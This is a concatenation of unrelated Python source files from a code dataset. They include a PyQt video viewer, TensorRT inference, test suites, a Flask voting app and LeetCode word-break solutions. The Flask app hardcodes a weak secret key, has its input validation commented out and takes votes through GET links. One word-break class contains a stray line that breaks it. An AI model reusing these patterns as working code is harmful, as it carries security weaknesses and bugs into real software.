layout.addWidget(label)\n return label\n\n def _add_figure(self, h, w, layout):\n layout.addSpacing(40)\n self.figure_index += 1\n tight = { 'pad': .0 }\n figure = plt.figure(self.figure_index, figsize=(w/FIGURE_DPI, h/FIGURE_DPI), frameon=False, tight_layout=tight)\n canvas = FigureCanvas(figure)\n layout.addWidget(canvas)\n return (figure.add_subplot(), canvas)\n\n def _set_clip_track_label(self):\n clip = self.view_clip\n location = clip.location if clip.location is not None else 'unknown location'\n track = self.view_track\n self.top_label.setText(f'Clip 
{clip.clip_id} recorded at {location} starting at {clip.start_time}: Track {track.track_id} identified as {track.tag} with {len(track.raw_bounds)} frames')\n\n def set_clip(self, clipfn):\n self.status_bar.showMessage('Loading clip...')\n view_clip = clipfn()\n self.view_clip = view_clip\n self.last_view_button.setEnabled(self.data_navigator.has_last())\n self.next_view_button.setEnabled(self.data_navigator.has_next())\n self.track_combo_box.currentTextChanged.connect(None)\n for i in range(self.track_combo_box.count()):\n self.track_combo_box.removeItem(i)\n track_ids = [t.track_id for t in view_clip.view_tracks]\n self.track_combo_box.addItems(track_ids)\n self.track_combo_box.currentTextChanged.connect(self._track_combo)\n self.set_track(view_clip.view_tracks[0])\n self.status_bar.clearMessage()\n\n def set_track(self, view_track):\n self.status_bar.showMessage(f'Setting track {view_track.track_id}')\n self.view_track = view_track\n self.set_frame(view_track.current_data)\n self.status_bar.showMessage(f'Set track {view_track.track_id}', 2000)\n self._set_clip_track_label()\n #self.thumbnails_layout = QHBoxLayout()\n #self.image_labels = []\n\n def _draw_to_label(self, data, dims, label):\n start = time.process_time()\n data = cv2.resize(data, dims, interpolation=cv2.INTER_CUBIC)\n h, w = data.shape\n image = QImage(w, h, QImage.Format_RGB32)\n frame = normalize(data).astype(np.uint8)\n raw_values = matplotlib.cm.magma(frame)\n #print(f'magma values min {raw_values.min()}, max {raw_values.max()}')\n color_values = np.uint8(raw_values * 255)\n for rnum in range(h):\n for cnum in range(w):\n values = color_values[rnum, cnum]\n image.setPixel(cnum, rnum, qRgb(values[0], values[1], values[2]))\n label.setPixmap(QPixmap.fromImage(image))\n label.update()\n print(f'drawing label took {time.process_time() - start:.4f} seconds')\n\n def set_frame(self, framefn):\n cframe, dframe, rcrop, acrop, aframe, bounds, amass = framefn()\n track = self.view_track\n index = track.current_index\n pixel_count = np.sum(track.raw_crops[index] > 0)\n raw_bounds = track.raw_bounds[index]\n bound_dims = (raw_bounds[2]-raw_bounds[0], raw_bounds[3]-raw_bounds[1])\n self.frame_label.setText(f'Frame {index} : mass {track.adjust_masses[index]} pixel count {pixel_count} raw bounds {raw_bounds} dimension {bound_dims}')\n self.last_frame_button.setEnabled(self.view_track.has_last())\n self.next_frame_button.setEnabled(self.view_track.has_next())\n for frame, (axes, canvas) in [(cframe, self.cframe_figure), (dframe, self.dframe_figure), (self.view_track.background, self.bframe_figure)]:\n #print(f'drawing image of size {frame.shape} from track - min {frame.min()}, max {frame.max()}')\n frame = clip_and_scale(frame)\n #print(f'after clipping and scaling min {frame.min()}, max {frame.max()}')\n #self._draw_to_label(frame, self.frame_display_dims, label)\n start = time.process_time()\n axes.axis('off')\n axes.imshow(frame, cmap='magma', origin='upper', aspect='auto', interpolation='hamming')\n canvas.draw()\n print(f'drawing figure took {time.process_time() - start:.4f} seconds')\n rcrop = clip_and_scale(rcrop)\n display_dims = tuple([d * 5 for d in reversed(rcrop.shape)])\n self.rcrop_label.setFixedSize(display_dims[0], display_dims[1])\n self._draw_to_label(rcrop, display_dims, self.rcrop_label)\n for crop, label in [(acrop, self.acrop_label), (aframe, self.xcrop_label)]:\n crop = clip_and_scale(crop)\n self._draw_to_label(crop, self.clip_display_dims, label)\n\n\ndef run_ui():\n file_hdf5 = h5py.File(DATASET_PATH, 'r')\n 
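# Expected HDF5 layout: a top-level 'clips' group holding one group per clip,\n    # each with a background_frame dataset plus one child group per track.\n    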
clips_hdf5 = file_hdf5['clips']\n app = QApplication()\n app.setApplicationName('Cacophony Infrared Video Viewer')\n clip_keys = [k for k in clips_hdf5]\n navigator = Navigator(clip_keys, clips_hdf5)\n window = ViewerWindow(FRAME_DIMS, CLIP_DIMS, navigator)\n window.resize(1200, 800)\n window.show()\n sys.exit(app.exec_())\n\n\nif __name__ == '__main__':\n run_ui()","repo_name":"dsosnoski/irvideo-classification","sub_path":"preprocess/sample_viewer.py","file_name":"sample_viewer.py","file_ext":"py","file_size_in_byte":14187,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"73963452392","text":"import argparse\nimport tensorrt as trt\nimport pycuda.driver as cuda\nimport numpy as np\nimport pycuda.autoinit\n\n\nTRT_LOGGER = trt.Logger()\n\n\nclass HostDeviceMem(object):\n def __init__(self, host_mem, device_mem):\n self.host = host_mem\n self.device = device_mem\n\n def __str__(self):\n return \"Host:\\n\" + str(self.host) + \"\\nDevice:\\n\" + str(self.device)\n\n def __repr__(self):\n return self.__str__()\n\n\ndef load_engine(engine_path):\n with open(engine_path, \"rb\") as f, trt.Runtime(TRT_LOGGER) as runtime:\n return runtime.deserialize_cuda_engine(f.read())\n \ndef allocate_buffers(engine):\n inputs = list()\n outputs = list()\n bindings = list()\n for binding in engine:\n size = trt.volume(engine.get_binding_shape(binding)) * \\\n engine.max_batch_size * np.dtype(np.float32).itemsize\n dtype = trt.nptype(engine.get_binding_dtype(binding))\n # Allocate host and device buffers\n host_mem = cuda.pagelocked_empty(size, dtype)\n device_mem = cuda.mem_alloc(host_mem.nbytes)\n # Append the device buffer to device bindings.\n bindings.append(int(device_mem))\n # Append to the appropriate list.\n if engine.binding_is_input(binding):\n inputs.append(HostDeviceMem(host_mem, device_mem))\n else:\n outputs.append(HostDeviceMem(host_mem, device_mem))\n return inputs, outputs, bindings\n\n\ndef evaluate(engine, host_input):\n cuda.init()\n device = cuda.Device(0) # enter your Gpu id here\n ctx = device.make_context()\n stream = cuda.Stream()\n inputs, outputs, bindings = allocate_buffers(engine)\n ctx.pop()\n inputs[0].host = host_input\n context = engine.create_execution_context()\n # Transfer input data to the GPU.\n [cuda.memcpy_htod_async(inp.device, inp.host, stream)\n for inp in inputs]\n # Run inference.\n context.execute_async_v2(bindings=bindings, stream_handle=stream.handle)\n # Transfer predictions back from the GPU.\n [cuda.memcpy_dtoh_async(out.host, out.device, stream)\n for out in outputs]\n # Synchronize the stream\n stream.synchronize()\n # Return only the host outputs.\n outputs = [out.host for out in outputs]\n return np.argmax(outputs)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='TensorRT Inference')\n parser.add_argument('--engine', type=str, default='resnet-18-fp32.engine',\n help='Path to serialized engine file')\n\n args = parser.parse_args()\n\n engine = load_engine(args.engine)\n # input_shape = engine.get_binding_shape()\n # input_shape = (1, 3, input_shape[2], input_shape[3])\n # print(input_shape)\n input_shape = (1, 3, 224, 224)\n input_data = np.random.rand(*input_shape)\n print(evaluate(engine, input_data))\n\n ","repo_name":"jc-su/tvm_tensorrt","sub_path":"python/trt_evaluate.py","file_name":"trt_evaluate.py","file_ext":"py","file_size_in_byte":2829,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"72"} 
+{"seq_id":"32699784566","text":"import os\r\n\r\nImagepath = os.path.abspath('C:/Users/asus/Whatsapp Automation/test.jpg')\r\ndriver.find_element_by_id(\"Id of the element\").clear()\r\ndriver.find_element_by_id(\"Id of the element\").send_keys(Imagepath)\r\n\r\n\r\nelm.send_keys(os.getcwd() + \"/test.jpg\")\r\n\r\n\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.common.action_chains import ActionChains\r\n\r\ndriver = webdriver.Firefox()\r\ndriver.get(\"your.site.with.dragndrop.functionality.com\")\r\nsource_element = driver.find_element_by_name('your element to drag')\r\ndest_element = driver.find_element_by_name('element to drag to')\r\nActionChains(driver).drag_and_drop(source_element, dest_element).perform()","repo_name":"sudamerushabh/whatsappAutomation","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":661,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"7801308661","text":"textul=input(\"Introduceti textul dorit:\")\r\ndef litera_mare(textul):\r\n propozitii=textul.split('.')\r\n for i in propozitii:\r\n print(i.capitalize())\r\n\r\nlitera_mare(textul)\r\n\r\ntextul2=input(\"Introduceti textul dorit:\")\r\ndef dictionar_count(textul):\r\n numaraparitii = {}\r\n for n in textul:\r\n keys = numaraparitii.keys()\r\n if n in keys:\r\n numaraparitii[n] += 1 \r\n else:\r\n numaraparitii[n] = 1\r\n print(numaraparitii)\r\n print(numaraparitii.keys())\r\n print(numaraparitii.values())\r\n print(numaraparitii.items())\r\n \r\ndictionar_count(textul2)","repo_name":"elenacotan/Course5","sub_path":"Curs5_ex2.py","file_name":"Curs5_ex2.py","file_ext":"py","file_size_in_byte":609,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"17070542844","text":"import urllib.parse\n\nfrom django.test import Client, TestCase\nfrom django.urls import reverse\n\nfrom tenancy.models import Tenant, TenantGroup\nfrom utilities.testing import create_test_user\n\n\nclass TenantGroupTestCase(TestCase):\n\n def setUp(self):\n user = create_test_user(permissions=['tenancy.view_tenantgroup'])\n self.client = Client()\n self.client.force_login(user)\n\n TenantGroup.objects.bulk_create([\n TenantGroup(name='Tenant Group 1', slug='tenant-group-1'),\n TenantGroup(name='Tenant Group 2', slug='tenant-group-2'),\n TenantGroup(name='Tenant Group 3', slug='tenant-group-3'),\n ])\n\n def test_tenantgroup_list(self):\n\n url = reverse('tenancy:tenantgroup_list')\n\n response = self.client.get(url, follow=True)\n self.assertEqual(response.status_code, 200)\n\n\nclass TenantTestCase(TestCase):\n\n def setUp(self):\n user = create_test_user(permissions=['tenancy.view_tenant'])\n self.client = Client()\n self.client.force_login(user)\n\n tenantgroup = TenantGroup(name='Tenant Group 1', slug='tenant-group-1')\n tenantgroup.save()\n\n Tenant.objects.bulk_create([\n Tenant(name='Tenant 1', slug='tenant-1', group=tenantgroup),\n Tenant(name='Tenant 2', slug='tenant-2', group=tenantgroup),\n Tenant(name='Tenant 3', slug='tenant-3', group=tenantgroup),\n ])\n\n def test_tenant_list(self):\n\n url = reverse('tenancy:tenant_list')\n params = {\n \"group\": TenantGroup.objects.first().slug,\n }\n\n response = self.client.get('{}?{}'.format(url, urllib.parse.urlencode(params)), follow=True)\n self.assertEqual(response.status_code, 200)\n\n def test_tenant(self):\n\n tenant = Tenant.objects.first()\n response = self.client.get(tenant.get_absolute_url(), follow=True)\n 
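# A user holding only the view_tenant permission should still receive a 200 for the detail page.\n        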
self.assertEqual(response.status_code, 200)\n","repo_name":"mtbutler07/netbox-heroku","sub_path":"netbox/tenancy/tests/test_views.py","file_name":"test_views.py","file_ext":"py","file_size_in_byte":1938,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"13043359896","text":"from contextlib import contextmanager\nimport pytest\nfrom click.testing import CliRunner\nimport tasks.cli\nimport tasks.config\nfrom tasks.api import Task\n\n\n@contextmanager\ndef stub_tasks_db():\n yield\n\n\ndef test_list_no_args(mocker):\n # Replace the _tasks_db() context manager with our stub that does nothing.\n mocker.patch.object(tasks.cli, \"_tasks_db\", new=stub_tasks_db)\n\n # Replace any calls to tasks.list_tasks() from within tasks.cli to a default\n # MagicMock object with a return value of an empty list.\n mocker.patch.object(tasks.cli.tasks, \"list_tasks\", return_value=[])\n\n # Use the Click CliRunner to do the same thing as calling tasks list on the command\n # line.\n runner = CliRunner()\n runner.invoke(tasks.cli.tasks_cli, [\"list\"])\n\n # Use the mock object to make sure the API call was called correctly.\n # assert_called_once_with() is part of unittest.mock.Mock objects.\n tasks.cli.tasks.list_tasks.assert_called_once_with(None)\n\n\n@pytest.fixture()\ndef no_db(mocker):\n \"\"\"Put the mock stubbing of _tasks_db into a fixture so we can reuse it more easily\n in future tests.\"\"\"\n mocker.patch.object(tasks.cli, \"_tasks_db\", new=stub_tasks_db)\n\n\ndef test_list_print_empty(no_db, mocker):\n mocker.patch.object(tasks.cli.tasks, \"list_tasks\", return_value=[])\n runner = CliRunner()\n result = runner.invoke(tasks.cli.tasks_cli, [\"list\"])\n expected_output = (\n \" ID owner done summary\\n\" \" -- ----- ---- -------\\n\"\n )\n\n # Check the output of the command-line action\n assert result.output == expected_output\n\n\ndef test_list_print_many_items(no_db, mocker):\n many_tasks = (\n Task(\"write chapter\", \"Brian\", True, 1),\n Task(\"edit chapter\", \"Katie\", False, 2),\n Task(\"modify chapter\", \"Brian\", False, 3),\n Task(\"finalize chapter\", \"Katie\", False, 4),\n )\n mocker.patch.object(tasks.cli.tasks, \"list_tasks\", return_value=many_tasks)\n runner = CliRunner()\n result = runner.invoke(tasks.cli.tasks_cli, [\"list\"])\n expected_output = (\n \" ID owner done summary\\n\"\n \" -- ----- ---- -------\\n\"\n \" 1 Brian True write chapter\\n\"\n \" 2 Katie False edit chapter\\n\"\n \" 3 Brian False modify chapter\\n\"\n \" 4 Katie False finalize chapter\\n\"\n )\n assert result.output == expected_output\n\n\ndef test_list_dash_o(no_db, mocker):\n mocker.patch.object(tasks.cli.tasks, \"list_tasks\")\n runner = CliRunner()\n runner.invoke(tasks.cli.tasks_cli, [\"list\", \"-o\", \"brian\"])\n tasks.cli.tasks.list_tasks.assert_called_once_with(\"brian\")\n\n\ndef test_list_dash_dash_owner(no_db, mocker):\n mocker.patch.object(tasks.cli.tasks, \"list_tasks\")\n runner = CliRunner()\n runner.invoke(tasks.cli.tasks_cli, [\"list\", \"--owner\", \"okken\"])\n tasks.cli.tasks.list_tasks.assert_called_once_with(\"okken\")\n","repo_name":"jashburn8020/python-testing-with-pytest","sub_path":"ch7/tasks_proj_v2/tests/unit/test_cli.py","file_name":"test_cli.py","file_ext":"py","file_size_in_byte":2895,"program_lang":"python","lang":"en","doc_type":"code","stars":44,"dataset":"github-code","pt":"72"} +{"seq_id":"32384860796","text":"from flask import Flask, render_template, redirect, request, session, url_for, flash\nimport 
re\nfrom flask_sqlalchemy import SQLAlchemy\nfrom sqlalchemy.sql import func\nfrom flask_migrate import Migrate\nfrom flask_bcrypt import Bcrypt\nfrom flask import json\n\n\napp = Flask(__name__)\n\napp.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///quarantine_friends.db'\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\n\ndb = SQLAlchemy(app)\nmigrate = Migrate(app, db)\n\napp.secret_key = 'secret key'\nEMAIL_REGEX = re.compile(r'^[a-zA-Z0-9.+_-]+@[a-zA-Z0-9._-]+\\.[a-zA-Z]+$')\nbcrypt = Bcrypt(app)\n\n\nupvote_table = db.Table('upvotes', \n db.Column('user_id', db.Integer, db.ForeignKey('user.id', ondelete='cascade'), primary_key=True), \n db.Column('item_id', db.Integer, db.ForeignKey('item.id', ondelete='cascade'), primary_key=True))\n\ndownvote_table = db.Table('downvotes', \n db.Column('user_id', db.Integer, db.ForeignKey('user.id', ondelete='cascade'), primary_key=True), \n db.Column('item_id', db.Integer, db.ForeignKey('item.id', ondelete='cascade'), primary_key=True))\n\nclass User(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n first_name = db.Column(db.String(255))\n last_name = db.Column(db.String(255))\n email = db.Column(db.String(255))\n password = db.Column(db.String(255))\n items_this_user_upvoted = db.relationship('Item', secondary=upvote_table)\n items_this_user_downvoted = db.relationship('Item', secondary=downvote_table)\n created_at = db.Column(db.DateTime, server_default=func.now())\n updated_at = db.Column(db.DateTime, server_default=func.now(), onupdate=func.now())\n\nclass Item(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n category = db.Column(db.String(255))\n lat = db.Column(db.String(255))\n lng = db.Column(db.String(255))\n votes = db.Column(db.Integer, default=0)\n users_who_upvoted_this_item = db.relationship('User', secondary=upvote_table)\n users_who_downvoted_this_item = db.relationship('User', secondary=downvote_table)\n created_at = db.Column(db.DateTime, server_default=func.now())\n updated_at = db.Column(db.DateTime, server_default=func.now(), onupdate=func.now())\n\nclass Comment(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n content = db.Column(db.String(255))\n author_id = db.Column(db.Integer, db.ForeignKey(\"user.id\", ondelete=\"cascade\"), nullable=False)\n author = db.relationship('User', foreign_keys=[author_id], backref=\"user_comments\")\n created_at = db.Column(db.DateTime, server_default=func.now())\n updated_at = db.Column(db.DateTime, server_default=func.now(), onupdate=func.now())\nclass Feedback(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n content = db.Column(db.String(255))\n authors_id = db.Column(db.Integer, db.ForeignKey(\"user.id\", ondelete=\"cascade\"), nullable=False)\n authors = db.relationship('User', foreign_keys=[authors_id], backref=\"user_feedback\")\n created_at = db.Column(db.DateTime, server_default=func.now())\n updated_at = db.Column(db.DateTime, server_default=func.now(), onupdate=func.now())\n\n\n@app.route('/')\ndef index():\n return render_template('index.html')\n\n@app.route('/on_signup', methods=['POST'])\ndef on_register():\n is_valid = True\n\n # validations\n # add check for existing user\n # if len(request.form['first_name']) < 3:\n # is_valid = False\n # flash('First name is too short', 'signup')\n # if len(request.form['last_name']) < 3:\n # is_valid = False\n # flash('Last name is too short', 'signup')\n # if not EMAIL_REGEX.match(request.form['email']):\n # is_valid = False\n # flash(\"Invalid email address\", 'signup')\n # if 
len(request.form['password']) < 6:\n    #         is_valid = False\n    #         flash('Password must be at least 6 characters', 'signup')\n    #     if request.form['password'] != request.form['confirm_password']:\n    #         is_valid = False\n    #         flash('Passwords do not match', 'signup')\n\n    if is_valid:\n        pw_hash = bcrypt.generate_password_hash(request.form['password'])\n        new_user = User(first_name=request.form['first_name'], last_name=request.form['last_name'], email=request.form['email'], password=pw_hash)\n        db.session.add(new_user)\n        db.session.commit()\n        user = User.query.filter_by(email=request.form['email']).first()\n        session['userid'] = user.id\n        return render_template('home.html', user = user)\n    else:\n        return redirect('/')\n\n@app.route('/on_login', methods=['post'])\ndef on_login():\n    \n    user = User.query.filter_by(email=request.form['email']).first()\n    if user == None:\n        flash('Could not log in')\n        return redirect('/')\n    elif bcrypt.check_password_hash(user.password, request.form['password']):\n        session['userid'] = user.id\n        return redirect('/dashboard')\n\n@app.route('/dashboard') #had to add a 'dashboard route' after login/signup because there was no way to come back to main page after you left main page after login.- Brian\ndef dashboard(): \n    results = User.query.filter_by(id=session['userid']).all()\n    return render_template('home.html', user=results[0])\n\n\n\n@app.route('/edit')\ndef edit():\n    results = User.query.get(session['userid'])\n    return render_template('edit.html', user = results)\n\n@app.route('/on_edit', methods=['post'])\ndef on_edit():\n    user_update = User.query.get(session['userid'])\n    if user_update:\n        user_update.first_name = request.form['first_name']\n        user_update.last_name = request.form['last_name']\n        user_update.email = request.form['email']\n        user_update.password = bcrypt.generate_password_hash(request.form['password'])\n        db.session.commit()\n        return redirect('/dashboard')\n    else:\n        return redirect('/edit')\n\n\n\n\n\n# start of routes under construction\n@app.route('/on_upvote/<id>')\ndef on_upvote(id):\n    item = Item.query.get(id)\n    user = User.query.get(session['userid'])\n\n    if item in user.items_this_user_downvoted:\n        user.items_this_user_downvoted.remove(item)\n        db.session.commit()\n        print('user removed from downvote list')\n\n    user.items_this_user_upvoted.append(item)\n    db.session.commit()\n    print('user added to upvote list')\n\n    item.votes +=1\n    db.session.commit()\n    print('votes increased by 1')\n\n    print('upvote process complete')\n    return redirect('/test')\n\n@app.route('/on_downvote/<id>')\ndef on_unlike(id):\n    item = Item.query.get(id)\n    user = User.query.get(session['userid'])\n\n    if item in user.items_this_user_upvoted:\n        user.items_this_user_upvoted.remove(item)\n        db.session.commit()\n        print('user removed from upvote list')\n\n    user.items_this_user_downvoted.append(item)\n    db.session.commit()\n    print('user added to downvote list')\n\n    item.votes -=1\n    db.session.commit()\n    print('votes reduced by 1')\n\n    print('downvote process complete')\n    return redirect('/test')\n\n@app.route('/on_comment', methods=['POST'])\ndef on_comment():\n    comment = Comment(content=request.form['comment'], author_id=session['userid'])\n    db.session.add(comment)\n    db.session.commit()\n    return redirect('/test')\n\n# end of routes under construction\n\n\n\n\n\n@app.route('/on_logout')\ndef logout():\n    session.clear()\n    return redirect('/')\n\n@app.route('/test')\ndef test():\n    # checks if user is logged in\n    if 'userid' not in session:\n        return redirect('/')\n\n    user = User.query.get(session['userid'])\n    
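# Build one marker dict (coords, icon image, vote links) per item that still has a non-negative score.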
items = Item.query.all()\n\n markers = []\n \n if items:\n\n # get logged in user info\n for item in items:\n\n # doesn't add item if less than 0 votes\n if item.votes >= 0:\n temp = {}\n\n # set coords of item\n coords = {\n 'lat' : float(item.lat),\n 'lng' : float(item.lng)\n }\n\n # checks category and sets correct iconImage\n if item.category == 'toiletPaper':\n iconImage = 'https://i.ibb.co/Zx24VKX/toilet-Paper.png'\n\n # sets correct voting links\n if user in item.users_who_upvoted_this_item:\n content = '
Votes: %s <a href=\"/on_downvote/%s\">Downvote</a>' % (item.votes, item.id)\n                    elif user in item.users_who_downvoted_this_item:\n                        content = 'Votes: %s <a href=\"/on_upvote/%s\">Upvote</a>' % (item.votes, item.id)\n                    else:\n                        content = 'Votes: %s <a href=\"/on_upvote/%s\">Upvote</a> <a href=\"/on_downvote/%s\">Downvote</a>
' % (item.votes, item.id, item.id)\n \n # updates object to marker list\n temp.update({\n 'coords' : coords,\n 'iconImage' : iconImage,\n 'content' : content\n })\n markers.append(temp)\n \n comments = Comment.query.all()\n\n return render_template('test.html', markers=markers, comments=comments)\n\n@app.route('/on_test', methods=['POST'])\ndef ontest():\n print(request.form)\n new_item = Item(category=request.form['category'], lat=request.form['lat'], lng=request.form['lng'])\n db.session.add(new_item)\n db.session.commit()\n return redirect('/test')\n\n#feedback routes\n@app.route('/feedback')\ndef feedback_page():\n reviews = Feedback.query.all()\n return render_template('feedback.html', reviews=reviews)\n\n@app.route('/on_feedback', methods=['post'])\ndef on_feedback():\n new_feedback = Feedback(content=request.form['reviews'], authors_id=session['userid'])\n if new_feedback:\n db.session.add(new_feedback)\n db.session.commit()\n return redirect('/feedback')\n else:\n return redirect('/feedback')\n#end feedback routes\n\nif __name__ == '__main__':\n app.run(debug=True)","repo_name":"JustinGillis/Quarantine-Friends","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":10064,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"3628532057","text":"\n\n\nfrom a.infra.misc.enum_with_value import EnumWithValue\nfrom a.infra.basic.return_codes import ReturnCodes\n\nimport socket\n\nfrom a.api.yang.modules.tech.common.qwilt_tech_storage_module.qwilt_tech_storage_module_module_gen import StorageModuleLocationTypeType\n\n\nclass SystemDefaultsData(object):\n\n def __init__ (self):\n\n self.controller = \"\"\n self._myHasController=False\n \n self.enabled = False\n self._myHasEnabled=False\n \n self.description = \"\"\n self._myHasDescription=False\n \n self.locationType = StorageModuleLocationTypeType.kNone\n self._myHasLocationType=False\n \n\n def copyFrom (self, other):\n\n self.controller=other.controller\n self._myHasController=other._myHasController\n \n self.enabled=other.enabled\n self._myHasEnabled=other._myHasEnabled\n \n self.description=other.description\n self._myHasDescription=other._myHasDescription\n \n self.locationType=other.locationType\n self._myHasLocationType=other._myHasLocationType\n \n # has...() methods\n\n def hasController (self):\n return self._myHasController\n\n def hasEnabled (self):\n return self._myHasEnabled\n\n def hasDescription (self):\n return self._myHasDescription\n\n def hasLocationType (self):\n return self._myHasLocationType\n\n\n # setHas...() methods\n\n def setHasController (self):\n self._myHasController=True\n\n def setHasEnabled (self):\n self._myHasEnabled=True\n\n def setHasDescription (self):\n self._myHasDescription=True\n\n def setHasLocationType (self):\n self._myHasLocationType=True\n\n\n def clearAllHas (self):\n\n self._myHasController=False\n\n self._myHasEnabled=False\n\n self._myHasDescription=False\n\n self._myHasLocationType=False\n\n\n def __str__ (self):\n items=[]\n\n x=\"\"\n if self._myHasController:\n x = \"+\"\n leafStr = str(self.controller)\n items.append(x + \"Controller=\"+leafStr)\n\n x=\"\"\n if self._myHasEnabled:\n x = \"+\"\n leafStr = str(self.enabled)\n items.append(x + \"Enabled=\"+leafStr)\n\n x=\"\"\n if self._myHasDescription:\n x = \"+\"\n leafStr = str(self.description)\n items.append(x + \"Description=\"+leafStr)\n\n x=\"\"\n if self._myHasLocationType:\n x = \"+\"\n leafStr = str(self.locationType)\n items.append(x + 
\"LocationType=\"+leafStr)\n\n return \"{SystemDefaultsData: \"+\",\".join(items)+\"}\"\n\n\"\"\"\nExtracted from the below data: \n{\n \"node\": {\n \"className\": \"SystemDefaultsData\", \n \"namespace\": \"system_defaults\", \n \"importStatement\": \"from a.api.yang.modules.tech.common.qwilt_tech_storage_module.tech.storage.module.system_defaults.system_defaults_data_gen import SystemDefaultsData\"\n }, \n \"ancestors\": [\n {\n \"namespace\": \"tech\", \n \"isCurrent\": false\n }, \n {\n \"namespace\": \"storage\", \n \"isCurrent\": false\n }, \n {\n \"namespace\": \"module\", \n \"isCurrent\": false\n }, \n {\n \"namespace\": \"system_defaults\", \n \"isCurrent\": true\n }\n ], \n \"conditionalDebugName\": null, \n \"leaves\": [\n {\n \"typeHandler\": \"handler: StringHandler\", \n \"memberName\": \"controller\", \n \"yangName\": \"controller\", \n \"object\": \"\", \n \"leafrefPath\": null, \n \"defaultVal\": \"\", \n \"hasDefaultRef\": false\n }, \n {\n \"typeHandler\": \"handler: BoolPyHandler\", \n \"memberName\": \"enabled\", \n \"yangName\": \"enabled\", \n \"object\": \"\", \n \"leafrefPath\": null, \n \"defaultVal\": \"false\", \n \"hasDefaultRef\": false\n }, \n {\n \"typeHandler\": \"handler: StringHandler\", \n \"memberName\": \"description\", \n \"yangName\": \"description\", \n \"object\": \"\", \n \"leafrefPath\": null, \n \"defaultVal\": \"\", \n \"hasDefaultRef\": false\n }, \n {\n \"typeHandler\": \"handler: EnumHandlerPy\", \n \"memberName\": \"locationType\", \n \"yangName\": \"location-type\", \n \"object\": \"\", \n \"leafrefPath\": null, \n \"defaultVal\": \"none\", \n \"hasDefaultRef\": false\n }\n ], \n \"module\": {}, \n \"env\": {\n \"namespaces\": [\n \"a\", \n \"api\", \n \"yang\", \n \"modules\", \n \"tech\", \n \"common\", \n \"qwilt_tech_storage_module\"\n ]\n }, \n \"createTime\": \"2013\"\n}\n\"\"\"\n\n\n","repo_name":"afeset/miner2-tools","sub_path":"oscar/a/api/yang/modules/tech/common/qwilt_tech_storage_module/tech/storage/module/system_defaults/system_defaults_data_gen.py","file_name":"system_defaults_data_gen.py","file_ext":"py","file_size_in_byte":4787,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"36307015302","text":"class Trie:\n def __init__(self):\n self.node = {}\n self.end = '*'\n self.cache = {}\n \n def add(self, word):\n node = self.node\n for ch in word:\n if ch not in node:\n node[ch] = {}\n node = node[ch]\n node[self.end] = True\n \n def word_break(self, word, idx, node=None, depth=0):\n depth += 1\n if (idx, depth) not in self.cache:\n node = node or self.node\n ch = word[idx]\n if idx >= len(word)-1:\n self.cache[(idx, depth)] = ch in node and self.end in node[ch]\n elif ch not in node:\n self.cache[(idx, depth)] = False\n elif self.end in node[ch]:\n self.cache[(idx, depth)] = (\n self.word_break(word, idx+1, node[ch], depth)\n or self.word_break(word, idx+1, self.node, 0)\n )\n else:\n self.cache[(idx, depth)] = self.word_break(word, idx+1, node[ch], depth)\n return self.cache[(idx, depth)]\n \n\nclass Solution:\n a\n def wordBreak(self, s: str, word_dict) -> bool:\n trie = Trie()\n [trie.add(word) for word in word_dict]\n return trie.word_break(s, 0)\n\n\n### Ingenious and fast solution from submitted\nclass Solution:\n def wordBreak(self, s: str, wordDict: List[str]) -> bool:\n X = {}\n def wordBreak_(x):\n if x not in X:\n X[x] = False\n for word in wordDict:\n if x.startswith(word):\n n = len(word)\n if len(x) == n or wordBreak_(x[n:]):\n X[x] = True\n break\n 
\n return X[x]\n \n return wordBreak_(s)\n","repo_name":"tonymontaro/leetcode-hints","sub_path":"problems/word-break/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1813,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"41038122741","text":"from preprocess.util import *\n\nclass FeatureGenerator(object):\n def produce_mapping_dict(self, ts, exp_id):\n trans_to_int = dict()\n int_to_trans = dict()\n states_to_int = dict()\n int_to_states = dict()\n i = 0\n j = 0\n for ai in ts:\n states_to_int[ai] = i\n int_to_states[i] = ai\n i+=1\n for aj in ts[ai]['outgoings']:\n trans_name = \"/\".join((ai,aj))\n trans_to_int[trans_name] = j\n int_to_trans[j] = trans_name\n j+=1\n save_obj(trans_to_int, \"trans_to_int_{}\".format(exp_id))\n save_obj(int_to_trans, \"int_to_trans_{}\".format(exp_id))\n save_obj(states_to_int, \"states_to_int_{}\".format(exp_id))\n save_obj(int_to_states, \"int_to_states_{}\".format(exp_id))\n\n return trans_to_int, int_to_trans, states_to_int, int_to_states\n\n def produce_states_list(self, ts):\n all_nodes = list(set([ai for ai in ts]))\n all_nodes.remove('START')\n all_nodes = sorted(all_nodes)\n return all_nodes\n\n def produce_window(self, start, end, range_days=0, range_seconds=0, stride_days=0, stride_seconds=0):\n import datetime\n window_list = list()\n range_timedelta = datetime.timedelta(range_days, range_seconds)\n stride_timedelta = datetime.timedelta(stride_days, stride_seconds)\n start, end = get_dt_from_string(start), get_dt_from_string(end)\n dt1, dt2 = start, start\n while dt2 < end:\n dt2 = dt1 + range_timedelta\n str_dt1 = get_string_from_dt(dt1)\n str_dt2 = get_string_from_dt(dt2)\n window_list.append((str_dt1, str_dt2))\n dt1 = dt1 + stride_timedelta\n return window_list\n\n def 